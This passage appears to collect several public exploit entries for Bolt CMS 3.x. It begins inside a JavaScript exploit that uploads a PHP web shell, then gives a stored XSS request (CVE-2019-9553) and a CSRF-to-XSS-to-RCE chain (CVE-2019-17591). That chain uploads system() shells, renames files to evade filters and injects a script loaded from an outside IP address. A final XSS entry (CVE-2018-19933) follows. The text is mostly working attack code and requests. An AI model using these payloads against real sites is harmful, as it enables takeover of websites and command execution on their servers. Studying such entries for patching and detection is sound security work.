rcool+Webdesign+Co.%22+%5D%0D%0A%23+++++news_source%3A+http%3A%2F%2Fnews.example.org%0D%0A%23+++++news_variable%3A+news%0D%0A%0D%0A%23+Show+the+\\\'debug\\\'+nut+in+the+lower+right+corner+for+logged-in+user.+By+default%2C%0D%0A%23+the+debugbar+is+only+shown+to+logged-in+users.+Use+the+\\\'debug_show_loggedoff\\\'%0D%0A%23+option+to+show+it+to+all+users.+You+probably+do+not+want+to+use+this+in+a%0D%0A%23+production+environment.%0D%0Adebug%3A+true%0D%0Adebug_show_loggedoff%3A+true%0D%0Adebug_permission_audit_mode%3A+false%0D%0Adebug_error_level%3A+8181+++++++++++%23+equivalent+to+E_ALL+%26~+E_NOTICE+%26~+E_DEPRECATED+%26~+E_USER_DEPRECATED+%26~+E_WARNING%0D%0A%23+debug_error_level%3A+-1+++++++++++++++%23+equivalent+to+E_ALL%0D%0Adebug_error_use_symfony%3A+false++++++%23+When+set+to+true%2C+Symfony+Profiler+will+be+used+for+exception+display+when+possible%0D%0Adebug_trace_argument_limit%3A+4+++++++%23+Determine+how+many+steps+in+the+backtrace+will+show+(dump)+arguments.%0D%0A%0D%0A%23+error+level+when+debug+is+disabled%0D%0Aproduction_error_level%3A+8181+%23+%3D+E_ALL+%26~+E_NOTICE+%26~+E_WARNING+%26~+E_DEPRECATED+%26~+E_USER_DEPRECATED%0D%0A%0D%0A%23+System+debug+logging%0D%0A%23+This+will+enable+intensive+logging+of+Silex+functions+and+will+be+very+hard+on%0D%0A%23+performance+and+log+file+size.++++The+log+file+will+be+created+in+your+cache%0D%0A%23+directory.%0D%0A%23%0D%0A%23+Enable+this+for+short+time+periods+only+when+diagnosing+system+issues.%0D%0A%23+The+level+can+be+either%3A+DEBUG%2C+INFO%2C+NOTICE%2C+WARNING%2C+ERROR%2C+CRITICAL%2C+ALERT%2C+EMERGENCY%0D%0Adebuglog%3A%0D%0A++++enabled%3A+false%0D%0A++++filename%3A+bolt-debug.log%0D%0A++++level%3A+DEBUG%0D%0A%0D%0A%23+Use+strict+variables.+This+will+make+Bolt+complain+if+you+use+%7B%7B+foo+%7D%7D%2C%0D%0A%23+when+foo+doesn\\\'t+exist.%0D%0Astrict_variables%3A+false%0D%0A%0D%0A%23+There+are+several+options+for+giving+editors+more+options+to+insert+images%2C%0D%0A%23+video%2C+etc+in+the+WYSIWYG+areas.+But%2C+as+you+give+them+more+options%2C+that%0D%0A%23+means+they+also+have+more+ways+of+breaking+the+preciously+designed+layout.%0D%0A%23%0D%0A%23+By+default+the+most+\\\'dangerous\\\'+options+are+set+to+\\\'false\\\'.+If+you+choose+to%0D%0A%23+enable+them+for+your+editors%2C+please+instruct+them+thoroughly+on+their%0D%0A%23+responsibility+not+to+break+the+layout.%0D%0Awysiwyg%3A%0D%0A++++images%3A+false++++++++++++%23+Allow+users+to+insert+images+in+the+content.%0D%0A++++anchor%3A+false++++++++++++%23+Adds+a+button+to+create+internal+anchors+to+link+to.%0D%0A++++tables%3A+false++++++++++++%23+Adds+a+button+to+insert+and+modify+tables+in+the+content.%0D%0A++++fontcolor%3A+false+++++++++%23+Allow+users+to+mess+around+with+font+coloring.%0D%0A++++align%3A+false+++++++++++++%23+Adds+buttons+for+\\\'align+left\\\'%2C+\\\'align+right\\\'%2C+etc.%0D%0A++++subsuper%3A+false++++++++++%23+Adds+buttons+for+subscript+and+superscript%2C+using+%60%3Csub%3E%60+and+%60%3Csup%3E%60.%0D%0A++++embed%3A+false+++++++++++++%23+Allows+the+user+to+insert+embedded+video\\\'s+from+Youtube%2C+Vimeo%2C+etc.%0D%0A++++underline%3A+false+++++++++%23+Adds+a+button+to+underline+text%2C+using+the+%60%3Cu%3E%60-tag.%0D%0A++++ruler%3A+false+++++++++++++%23+Adds+a+button+to+add+a+horizontal+ruler%2C+using+the+%60%3Chr%3E%60-tag.%0D%0A++++strike%3A+false++++++++++++%23+Adds+a+button+to+add+stikethrough%2C+using+the+%60%3Cs%3E%60-tag.%0D%0A++++blockquote%3A+false++++++++%23+Allows+the+user+to+insert+blockquotes+using+the+%60%3Cblockquote%3E%60-tag.%0D%0A++++codesnippet%3A+false+++++++%23+Allows+the+user+to+insert+code+snippets+using+%60%3Cpre%3E%3Ccode%3E%60-tags.%0D%0A++++specialchar%3A+false+++++++%23+Adds+a+button+to+insert+special+chars+like+\\\'%E2%82%AC\\\'+or+\\\'%E2%84%A2\\\'.%0D%0A++++clipboard%3A+false+++++++++%23+Adds+buttons+to+\\\'undo\\\'+and+\\\'redo\\\'.%0D%0A++++copypaste%3A+false+++++++++%23+Adds+buttons+to+\\\'cut\\\'%2C+\\\'copy\\\'+and+\\\'paste\\\'.%0D%0A++++ck%3A%0D%0A++++++++autoParagraph%3A+true++%23+If+set+to+\\\'true\\\'%2C+any+pasted+content+is+wrapped+in+%60%3Cp%3E%60-tags+for+multiple+line-breaks%0D%0A++++++++disableNativeSpellChecker%3A+true+%23+If+set+to+\\\'true\\\'+it+will+stop+browsers+from+underlining+spelling+mistakes%0D%0A++++++++allowNbsp%3A+false+++++%23+If+set+to+\\\'false\\\'%2C+the+editor+will+strip+out+%60%26nbsp%3B%60+characters.+If+set+to+\\\'true\\\'%2C+it+will+allow+them.+%C2%AF%5C_(%E3%83%84)_%2F%C2%AF%0D%0A%0D%0A%23+Bolt+uses+the+Google+maps+API+for+it\\\'s+geolocation+field+and+Google+now%0D%0A%23+requires+that+it+be+loaded+with+an+API+key+on+new+domains.+You+can+generate%0D%0A%23+a+key+at+https%3A%2F%2Fdevelopers.google.com%2Fmaps%2Fdocumentation%2Fjavascript%2Fget-api-key%0D%0A%23+and+enter+it+here+to+make+sure+that+the+geolocation+field+works.%0D%0A%23+google_api_key%3A%0D%0A%0D%0A%23+Global+option+to+enable%2Fdisable+the+live+editor%0D%0Aliveeditor%3A+false%0D%0A%0D%0A%23+Use+the+\\\'mailoptions\\\'+setting+to+configure+how+Bolt+sends+email%3A+using+\\\'smtp\\\'%0D%0A%23+or+PHP\\\'s+built-in+%60mail()%60-function.%0D%0A%0D%0A%23+Note+that+the+latter+might+_seem_+easier%2C+but+it\\\'s+been+disabled+by+a+lot+of%0D%0A%23+webhosts%2C+in+order+to+prevent+spam+from+wrongly+configured+scripts.+If+you+use%0D%0A%23+it%2C+your+mail+might+disappear+into+a+black+hole%2C+without+producing+any+errors.%0D%0A%23+Generally+speaking%2C+using+\\\'smtp\\\'+is+the+better+option%2C+so+use+that+if+possible.%0D%0A%23%0D%0A%23+Protip%3A+If+your+webhost+does+not+support+SMTP%2C+sign+up+for+a+(free)+Sparkpost%0D%0A%23+account+at+https%3A%2F%2Fwww.sparkpost.com%2Fpricing%2F+for+sending+emails+reliably.%0D%0A%23%0D%0A%23+The+mail+defaults+use+bolt%40yourhostname+with+the+site+title+as+a+default.%0D%0A%23+Override+this+with+the+senderName+and+senderMail+fields%0D%0A%0D%0A%23+mailoptions%3A%0D%0A%23+++++transport%3A+smtp%0D%0A%23+++++spool%3A+true%0D%0A%23+++++host%3A+localhost%0D%0A%23+++++port%3A+25%0D%0A%23+++++username%3A+username%0D%0A%23+++++password%3A+password%0D%0A%23+++++encryption%3A+null%0D%0A%23+++++auth_mode%3A+null%0D%0A%23+++++senderMail%3A+null%0D%0A%23+++++senderName%3A+null%0D%0A%0D%0A%23+mailoptions%3A%0D%0A%23+++++transport%3A+mail%0D%0A%23+++++spool%3A+false%0D%0A%0D%0A%23+Bolt+allows+some+modifications+to+how+\\\'strict\\\'+login+sessions+are.+For+every%0D%0A%23+option+that+is+set+to+true%2C+it+becomes+harder+for+a+bad-willing+person+to%0D%0A%23+spoof+your+login+session.+However%2C+it+also+requires+you+to+re-authenticate%0D%0A%23+more+often+if+you+change+location(ip-address)+or+your+browser+has+frequent%0D%0A%23+upgrades.+Only+change+these+if+you+know+what+you\\\'re+doing%2C+and+you\\\'re+having%0D%0A%23+issues+with+the+default+settings.%0D%0A%23%0D%0A%23+Note%3A+If+you+change+any+of+these%2C+all+current+users+will+automatically+be%0D%0A%23+++++++logged+off.%0D%0Acookies_use_remoteaddr%3A+true%0D%0Acookies_use_browseragent%3A+false%0D%0Acookies_use_httphost%3A+true%0D%0A%0D%0A%23+The+length+of+time+a+user+stays+\\\'logged+in\\\'.+Change+to+0+to+end+the+session%0D%0A%23+when+the+browser+is+closed.%0D%0A%23%0D%0A%23+The+default+is+1209600+(two+weeks%2C+in+seconds).%0D%0Acookies_lifetime%3A+1209600%0D%0A%0D%0A%23+Set+the+session+cookie+to+a+specific+domain.+Leave+blank%2C+unless+you+know+what%0D%0A%23+you\\\'re+doing.%0D%0A%23%0D%0A%23+When+set+incorrectly%2C+you+might+not+be+able+to+log+on+at+all.%0D%0A%23%0D%0A%23+If+you\\\'d+like+it+to+be+valid+for+all+subdomains+of+\\\'www.example.org\\\'%2C+set+this%0D%0A%23+to+\\\'.example.org\\\'.%0D%0Acookies_domain%3A%0D%0A%0D%0A%23+The+hash_strength+determines+the+amount+of+iterations+for+encrypting%0D%0A%23+passwords.%0D%0A%23%0D%0A%23+A+higher+number+means+a+harder+to+decrypt+password%2C+but+takes+longer+to%0D%0A%23+compute.+\\\'8\\\'+is+the+minimum%2C+\\\'10\\\'+is+the+default%2C+\\\'12\\\'+is+better.%0D%0Ahash_strength%3A+10%0D%0A%0D%0A%23+Bolt+sets+the+%60X-Frame-Options%60+and+%60Frame-Options%60+to+%60SAMEORIGIN%60+by%0D%0A%23+default%2C+to+prevent+the+web+browser+from+rendering+an+iframe+if+origin%0D%0A%23+mismatch+(i.e.+iframe+source+refers+to+a+different+domain).%0D%0A%23%0D%0A%23+Setting+this+to+\\\'false\\\'%2C+will+prevent+the+setting+of+these+headers.%0D%0A%23+headers%3A%0D%0A%23+++++x_frame_options%3A+true%0D%0A%0D%0A%23+Bolt+uses+market.bolt.cm+to+fetch+it\\\'s+extensions+by+default.+You+can%0D%0A%23+change+that+URL+here.%0D%0A%23%0D%0A%23+Do+not+change+this%2C+unless+you+know+what+you\\\'re+doing%2C+and+understand+the%0D%0A%23+associated+risks.+If+you+use+\\\'http%3A%2F%2Fmarket.bolt.cm\\\'%2C+Bolt+will+not+use%0D%0A%23+SSL%2C+increasing+the+risk+for+a+MITM+attacks.%0D%0A%23+extensions%3A%0D%0A%23+++++site%3A+\\\'https%3A%2F%2Fmarket.bolt.cm%2F\\\'%0D%0A%23+++++enabled%3A+true%0D%0A%23+++++composer%3A%0D%0A%23+++++++++minimum-stability%3A+stable++++++%23+Either+\\\'stable\\\'%2C+\\\'beta\\\'%2C+or+\\\'dev\\\'.+Setting+\\\'dev\\\'+will+allow+you+to+install+dev-master+versions+of+extensions.%0D%0A%23+++++++++prefer-stable%3A+true++++++++++++%23+Prefer+stable+releases+over+development+ones%0D%0A%23+++++++++prefer-dist%3A+true++++++++++++++%23+Forces+installation+from+package+dist+even+for+dev+versions.%0D%0A%23+++++++++prefer-source%3A+false+++++++++++%23+Forces+installation+from+package+sources+when+possible%2C+including+VCS+information.%0D%0A%23+++++++++config%3A%0D%0A%23+++++++++++++optimize-autoloader%3A+false+++++%23+Optimize+autoloader+during+autoloader+dump.%0D%0A%23+++++++++++++classmap-authoritative%3A+false++%23+Autoload+classes+from+the+classmap+only.+Implicitly+enables+%60optimize-autoloader%60.%0D%0A%0D%0A%23+Enforcing+the+use+of+SSL.+If+set%2C+all+pages+will+enforce+an+SSL+connection%2C%0D%0A%23+and+redirect+to+HTTPS+if+you+attempt+to+visit+plain+HTTP+pages.%0D%0A%23+enforce_ssl%3A+true%0D%0A%0D%0A%23+If+configured%2C+Bolt+will+trust+X-Forwarded-XXX+headers+from+the+listed+IP%0D%0A%23+addresses+and+ranges+when+determining+whether+the+current+request+is%0D%0A%23+\\\'secure\\\'.%0D%0A%23%0D%0A%23+This+is+required+to+correctly+determine+the+current+hostname+and+protocol%0D%0A%23+(HTTP+vs.+HTTPS)+when+running+behind+some+proxy%2C+e.g.+a+load+balancer%2C+cache%2C%0D%0A%23+or+SSL+proxy.%0D%0A%23%0D%0A%23+List+the+IP+addresses+or+subnets+that+you+know+are+such+proxies.%0D%0A%23%0D%0A%23+Note%3A+Allowing+hosts+here+that+may+not+be+trusted+proxies+is+a+security+risk.%0D%0A%23+++++++If+you+do+not+understand+what+this+does%2C+it+is+probably+best+to+not%0D%0A%23+++++++touch+it.%0D%0A%23+trustProxies%3A%0D%0A%23+++++-+127.0.0.1%0D%0A%23+++++-+10.0.0.0%2F8%0D%0A%0D%0A%23+If+you+want+Bolt+installation+get+news+through+a+proxy%0D%0A%23+httpProxy%3A%0D%0A%23+++++host%3A+scheme%3A%2F%2Fmy.proxy.server%3Aport%0D%0A%23+++++user%3A+%5Busr%5D%0D%0A%23+++++password%3A+%5Bpwd%5D%0D%0A%0D%0A%23+Options+for+backend+user+interface%0D%0A%23+backend%3A%0D%0A%23++++news%3A%0D%0A%23++++++++disable%3A+true+++++%23+Disable+news+panel.+Defaults+to+false.+%22Alerts%22+will+still+be+shown.%0D%0A%23++++stack%3A%0D%0A%23++++++++disable%3A+true+++++%23+Disable+stack+usage.+Defaults+to+false.%0D%0A%0D%0A%23+Options+that+will+be+forced+in+next+major+version%0D%0Acompatibility%3A%0D%0A++++%23+Whether+to+return+TemplateView+instead+of+TemplateResponse+from+Controller%5CBase%3A%3Arender()%0D%0A++++%23+Response+methods+cannot+be+used+on+TemplateView+objects.%0D%0A++++%23+Setting+this+value+to+false+is+deprecated.%0D%0A++++template_view%3A+true%0D%0A++++%23+Set+to+\\\'false\\\'+to+enable+using+a+newer+version+of+the+setcontent+parser.%0D%0A++++setcontent_legacy%3A+true%0D%0A&file_edit%5Bsave%5D=undefined\\n\";\r\n" +
" var aBody = new Uint8Array(body.length);\r\n" +
" for (var i = 0; i \x3c aBody.length; i++)\r\n" +
" aBody[i] = body.charCodeAt(i); \r\n" +
" xhr.send(new Blob([aBody]));\r\n" +
" }\r\n" +
"\r\n" +
" function UploadShell() {\r\n" +
" var xhr = new XMLHttpRequest();\r\n" +
" xhr.open(\"POST\", bolt_admin_url + \"/upload\", true);\r\n" +
" xhr.setRequestHeader(\"Accept\", \"application\\/json, text\\/javascript, *\\/*; q=0.01\");\r\n" +
" xhr.setRequestHeader(\"Accept-Language\", \"en-US,en;q=0.5\");\r\n" +
" xhr.setRequestHeader(\"Content-Type\", \"multipart\\/form-data; boundary=---------------------------130713229751679908527494159\");\r\n" +
" xhr.withCredentials = true;\r\n" +
" var body = \"-----------------------------130713229751679908527494159\\r\\n\" + \r\n" +
" \"Content-Disposition: form-data; name=\\\"files[]\\\"; filename=\\\"shell.php\\\"\\r\\n\" + \r\n" +
" \"Content-Type: text/plain\\r\\n\" + \r\n" +
" \"\\r\\n\" + \r\n" +
" \"\\x3c?php echo(system($_GET[\\\'cmd\\\'])); ?\\x3e\\n\" + \r\n" +
" \"\\r\\n\" + \r\n" +
" \"-----------------------------130713229751679908527494159--\\r\\n\";\r\n" +
" var aBody = new Uint8Array(body.length);\r\n" +
" for (var i = 0; i \x3c aBody.length; i++)\r\n" +
" aBody[i] = body.charCodeAt(i); \r\n" +
" xhr.send(new Blob([aBody]));\r\n" +
" }\r\n" +
" }\r\n" +
"\r\n" +
" exploit();\r\n" +
"\r\n" +
"\x3c/script\x3e\r\n" +
"\n" +
"\r\n" +
"-----------------------------130713229751679908527494159--\r\n";
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
setTimeout(function() {
var dateObj = new Date();
var folder = dateObj.getFullYear() + "-" + (String("00"+(dateObj.getMonth()+1)).slice(-2));
document.getElementById('stager').src = target + "/files/"+folder+"/stager.html";
console.log("Called stager! Wait a moment and access: " + target + "/files/" + folder + "/shell.php?cmd=whoami");
}, 2000);
}
window.onload = function() {
exploit();
};
</script>
<iframe id="stager" style="width:0;height:0;border:0;border:none" src=""></iframe>
</body>
</html>
# Exploit Title: Bolt CMS - 3.6.4 - Cross-Site Scripting
# Date: 2019-03-04
# Exploit Author: Ismail Tasdelen
# Vendor Homepage: https://bolt.cm/
# Software Link : https://github.com/bolt/bolt
# Software : Bolt CMS - v 3.6.4
# Version : v 3.6.4
# Vulernability Type : Cross-site Scripting
# Vulenrability : Stored XSS
# CVE : CVE-2019-9553
# The XSS vulnerability has been discovered in the Bolt CMS web application software due to its vulnerability in the source code in version 3.6.4.
# HTTP POST Request :
POST /bolt/editcontent/pages HTTP/1.1
Host: bolt-up3x24.bolt.dockerfly.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:65.0) Gecko/20100101 Firefox/65.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://bolt-up3x24.bolt.dockerfly.com/bolt/editcontent/pages
Content-Type: application/x-www-form-urlencoded
Content-Length: 562
DNT: 1
Connection: close
Cookie: bolt_session_5c201ab91521b607e364bc74271e51f1=3d540aa1d0a0fc38dde995dc6ba8a32e; bolt_authtoken_5c201ab91521b607e364bc74271e51f1=240049afe75abc53fbe51e75103ed138261da69b180ff241b7e815027c39f6fb
Upgrade-Insecure-Requests: 1
content_edit%5B_token%5D=u1EA_Zhor_EwrIyqIt-PLLK02DccGgZDDWFQm1325_8&editreferrer=&contenttype=pages&title=%22%3E%3Cscript%3Ealert%28%22ismailtasdelen%22%29%3C%2Fscript%3E&slug=script-alert-ismailtasdelen-script&image%5Bfile%5D=2019-03%2Fimg-src-x-onerror-prompt-1-.png&files%5B%5D=&teaser=%3Cp%3EBolt+3.6.4+CMS%3C%2Fp%3E%0D%0A&body=%3Cp%3EBolt+3.6.4+CMS%3C%2Fp%3E%0D%0A&template=&taxonomy%5Bgroups%5D%5B%5D=&taxonomy-order%5Bgroups%5D=0&id=&status=draft&datepublish=2019-03-04+08%3A24%3A47&datedepublish=&ownerid=1&_live-editor-preview=&content_edit%5Bsave%5D=1
# Exploit Title: Bolt CMS 3.6.10 - Cross-Site Request Forgery
# Date: 2019-10-15
# Exploit Author: r3m0t3nu11[Zero-Way]
# Vendor Homepage: https://bolt.cm/
# Software Link: https://bolt.cm/
# Version: up to date and 6.5
# Tested on: Linux
# CVE : CVE-2019-17591
# last version
# Csrf p0c
<html>
<body>
<head>
Bolt v 3.x exploit 0day
</head>
<h1>Bolt v 3.x csrf -> xss -> rce exploit</h1>
<img src ="
https://66.media.tumblr.com/8c1e5f1a62191b9091fd8736f8c4810b/tumblr_pf6q303FlE1vgbzx6o1_r1_400.jpg">
<script>
function submitRequest()
{
Csrf = async () => {
const xhr = new XMLHttpRequest();
xhr.open("POST",
"http:\/\/127.0.0.1\/index.php\/async\/folder\/create",
true);
xhr.setRequestHeader("Accept", "*\/*");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
xhr.setRequestHeader("Content-Type",
"application\/x-www-form-urlencoded; charset=UTF-8");
xhr.withCredentials = true;
var body = "parent=&foldername=sss&namespace=files";
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
xhr.onreadystatechange = async (e) => {
if (xhr.readyState === 4 && xhr.status === 200){
};
JSfuck1();
}
}
JSfuck1 = async () => {
const xhr = new XMLHttpRequest();
xhr.open("POST", "http:\/\/127.0.0.1\/index.php\/async\/file\/create",
true);
xhr.setRequestHeader("Accept", "*\/*");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
xhr.setRequestHeader("Content-Type", "application\/x-www-form-urlencoded;
charset=UTF-8");
xhr.withCredentials = true;
var body1 = "filename=aaa&parentPath=sss&namespace=files";
xhr.send(body1);
xhr.onreadystatechange = async (e) => {
if (xhr.readyState === 4 && xhr.status === 200){
}
};
where();
}
where = async () => {
const xhr = new XMLHttpRequest();
xhr.open("POST", "http:\/\/127.0.0.1\/index.php\/async\/file\/rename",
true);
xhr.setRequestHeader("Accept", "*\/*");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
xhr.setRequestHeader("Content-Type", "application\/x-www-form-urlencoded;
charset=UTF-8");
xhr.withCredentials = true;
var body2 =
"namespace=files&parent=sss&oldname=aaa&newname=aaa%3Cscript+src%3D'http%3A%26%23x2f%3B%26%23x2f%3B45.63.42.245%26%23x2f%3Bfinal.js'%3C%26%23x2f%3Bscript%3E.jpg";
xhr.send(body2);
}
Csrf();
}
</script>
<form action="#">
<input type="button" value="Submit request"
onclick="submitRequest();" />
</form>
</body>
</html>
JS p0c
<script>
Token = async () => {
var xhr = new XMLHttpRequest();
xhr.open("GET", "\/index.php\/bolt\/files", true);
xhr.responseType = "document";
xhr.withCredentials=true;
xhr.onreadystatechange = async (e) => {
if (xhr.readyState === 4 && xhr.status === 200){
doc = xhr.response;
token = doc.getElementsByName("file_upload[_token]")[0].value;
upload(token);
console.log(token);
}
};
xhr.send();
}
upload = async (csrfToken) =>{
var body =
"-----------------------------190530466613268610451083392867\r\n" +
"Content-Disposition: form-data; name=\"file_upload[select][]\";
filename=\"r3m0t3nu11.txt\"\r\n" +
"Content-Type: text/plain\r\n" +
"\r\n" +
"<?php system($_GET['test']);?>\r\n" +
"-----------------------------190530466613268610451083392867\r\n"
+
"Content-Disposition: form-data;
name=\"file_upload[upload]\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------190530466613268610451083392867\r\n"
+
"Content-Disposition: form-data;
name=\"file_upload[_token]\"\r\n" +
"\r\n" +
token
"-----------------------------190530466613268610451083392867--\r\n";
const xhr = new XMLHttpRequest();
xhr.open("POST", "http:\/\/127.0.0.1\/index.php\/bolt\/files", true);
xhr.setRequestHeader("Accept",
"text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
xhr.setRequestHeader("Content-Type", "multipart\/form-data;
boundary=---------------------------190530466613268610451083392867");
xhr.withCredentials = true;
xhr.onreadystatechange = async (e) => {
if (xhr.readyState === 4 && xhr.status === 200){
Shell();
}
};
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
}
Shell = async () => {
const xhr = new XMLHttpRequest();
xhr.open("POST", "http:\/\/127.0.0.1/index.php/async/file/rename", true);
xhr.setRequestHeader("Accept", "*\/*");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
xhr.setRequestHeader("Content-Type", "application\/x-www-form-urlencoded;
charset=UTF-8");
xhr.withCredentials = true;
xhr.timeout = 4000;
var body1 =
"namespace=files&parent=&oldname=r3m0t3nu11.txt&newname=dd%2Fphp-exif-systemasjpg%2Faa%2Fphp-exif-system.php%2Faaa.jpg";
xhr.send(body1);
bypass();
}
bypass = async () => {
const xhr = new XMLHttpRequest();
xhr.open("POST", "http:\/\/127.0.0.1/index.php/async/folder/rename", true);
xhr.setRequestHeader("Accept", "*\/*");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
xhr.setRequestHeader("Content-Type", "application\/x-www-form-urlencoded;
charset=UTF-8");
xhr.withCredentials = true;
xhr.timeout = 4000;
var body1 =
"namespace=files&parent=dd%2Fphp-exif-systemasjpg%2Faa/php-exif-system.php%2f&oldname=aaa.jpg&newname=bypass.php";
xhr.send(body1);
bypass2();
}
bypass2 = async () => {
const xhr = new XMLHttpRequest();
xhr.open("POST", "http:\/\/127.0.0.1/index.php/async/folder/rename", true);
xhr.setRequestHeader("Accept", "*\/*");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
xhr.setRequestHeader("Content-Type", "application\/x-www-form-urlencoded;
charset=UTF-8");
xhr.withCredentials = true;
xhr.timeout = 4000;
var body1 =
"namespace=files&parent=dd%2Fphp-exif-systemasjpg%2Faa/&oldname=php-exif-system.php&newname=bypass1";
xhr.send(body1);
}
Token();
</script>
version 6.5
CSrf p0c
<html>
<body>
<head>
Bolt v 3.x CVE-2019-17591 exploit
</head>
<h1>Bolt v 3.x csrf -> xss -> rce exploit</h1>
<img src ="
https://66.media.tumblr.com/8c1e5f1a62191b9091fd8736f8c4810b/tumblr_pf6q303FlE1vgbzx6o1_r1_400.jpg">
<script>
function submitRequest()
{
Csrf = async () => {
const xhr = new XMLHttpRequest();
xhr.open("POST",
"http:\/\/bolt-4mti18.bolt.dockerfly.com\/async\/file\/create",
true);
xhr.setRequestHeader("Accept", "*\/*");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
xhr.setRequestHeader("Content-Type",
"application\/x-www-form-urlencoded; charset=UTF-8");
xhr.withCredentials = true;
var body = "filename=test&parentPath=&namespace=files";
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
xhr.onreadystatechange = async (e) => {
if (xhr.readyState === 4 && xhr.status === 200){
JSfuck();
}
};
}
JSfuck = async () => {
const xhr = new XMLHttpRequest();
xhr.open("POST",
"http:\/\/bolt-4mti18.bolt.dockerfly.com\/async\/file\/rename",
true);
xhr.setRequestHeader("Accept", "*\/*");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
xhr.setRequestHeader("Content-Type", "application\/x-www-form-urlencoded;
charset=UTF-8");
xhr.withCredentials = true;
var body1 = "namespace=files&parent=&oldname=test&newname=<img src='x'
onerror=alert(1)>";
xhr.send(body1);
}
Csrf();
}
</script>
<form action="#">
<input type="button" value="Submit request"
onclick="submitRequest();" />
</form>
</body>
</html>
Js p0c
<script>
Token = async () => {
var xhr = new XMLHttpRequest();
xhr.open("GET", "\/bolt\/files", true);
xhr.responseType = "document";
xhr.withCredentials=true;
xhr.onreadystatechange = async (e) => {
if (xhr.readyState === 4 && xhr.status === 200){
doc = xhr.response;
token = doc.getElementsByName("file_upload[_token]")[0].value;
upload(token);
console.log(token);
}
}
xhr.send(null);
}
upload = async (csrfToken) =>{
var body =
"-----------------------------190530466613268610451083392867\r\n" +
"Content-Disposition: form-data; name=\"file_upload[select][]\";
filename=\"r3m0t3nu11.txt\"\r\n" +
"Content-Type: text/plain\r\n" +
"\r\n" +
"<?php system($_GET['test']);?>\r\n" +
"-----------------------------190530466613268610451083392867\r\n"
+
"Content-Disposition: form-data;
name=\"file_upload[upload]\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------190530466613268610451083392867\r\n"
+
"Content-Disposition: form-data;
name=\"file_upload[_token]\"\r\n" +
"\r\n" +
token
"-----------------------------190530466613268610451083392867--\r\n";
const xhr = new XMLHttpRequest();
xhr.open("POST", "http:\/\/127.0.0.1\/bolt\/files", true);
xhr.setRequestHeader("Accept",
"text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
xhr.setRequestHeader("Content-Type", "multipart\/form-data;
boundary=---------------------------190530466613268610451083392867");
xhr.withCredentials = true;
xhr.onreadystatechange = async (e) => {
if (xhr.readyState === 4 && xhr.status === 200){
Shell();
}
};
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
}
Shell = async () => {
const xhr = new XMLHttpRequest();
xhr.open("POST", "http:\/\/127.0.0.1/\/async\/file\/rename", true);
xhr.setRequestHeader("Accept", "*\/*");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
xhr.setRequestHeader("Content-Type", "application\/x-www-form-urlencoded;
charset=UTF-8");
xhr.withCredentials = true;
var body1 =
"namespace=files&parent=%2f&oldname=r3m0t3nu11.txt&newname=b.php";
xhr.send(body1);
}
Token();
</script>
proof of concept :
https://drive.google.com/file/d/1TRjzOM-q8cWK1JA9cN1Auhp7Ao3AXtbp/view?usp=sharing
https://drive.google.com/file/d/1QSE7Dnx0XZth9WciaohjhA6nk_-9jCr1/view?usp=sharing
Greetz to :
Samir-dz,YokO,0n3,Mr_Hex,syfi2k,Q8Librarian,Dr_hEx,dracula1337,z0mbi3_h4ck3r,Red
Virus,m7md1337,D3vil1337,and all my friends
# Exploit Title: Bolt CMS <3.6.2 - Cross-Site Scripting
# Google Dork: N/A
# Date: 2018-12-18
# Exploit Author: Raif Berkay Dincel [ author=9567 ]
# Contact: www.raifberkaydincel.com
# Vendor Homepage: bolt.cm
# Vulnerable Software --> [ https://github.com/rdincel1/Bolt-CMS-3.6.2---Cross-Site-Scripting/raw/master/bolt-v3.6.2.zip ]
# Affected Version: [ < 3.6.2 ]
# CVE-ID: CVE-2018-19933
# Tested on: Parrot Security OS / Linux Mint / Windows 10
# Vulnerable Parameter Type: POST
# Vulnerable Parameter: http://127.0.0.1:8000/preview/page
# Attack Pattern: <script>alert("Raif")</script>
# Description
Bolt CMS <3.6.2 allows XSS via text input click preview button as demonstrated by the Title field of a Configured and New Entry.
# PoC [Video]: https://youtu.be/3eTPyIpjCJg
# Proof of Concepts:
POST /preview/page HTTP/1.1
Host: 127.0.0.1:8000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1:8000/bolt/editcontent/pages
Content-Type: application/x-www-form-urlencoded
Content-Length: 396
Connection: close
